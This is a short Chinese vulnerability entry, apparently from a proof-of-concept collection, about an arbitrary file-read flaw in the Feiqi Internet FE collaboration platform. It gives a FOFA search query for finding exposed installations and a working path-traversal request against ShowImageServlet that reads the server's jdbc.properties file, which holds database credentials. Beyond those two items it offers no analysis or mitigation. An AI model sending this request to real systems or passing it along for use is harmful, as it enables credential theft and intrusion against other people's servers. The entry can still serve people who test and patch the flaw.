跳到主要内容

飞企互联FE业务协作平台存在参数文件读取漏洞

飞企互联 FE 业务协作平台存在参数文件读取漏洞

fofa

app="飞企互联-FE企业运营管理平台"

poc

/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print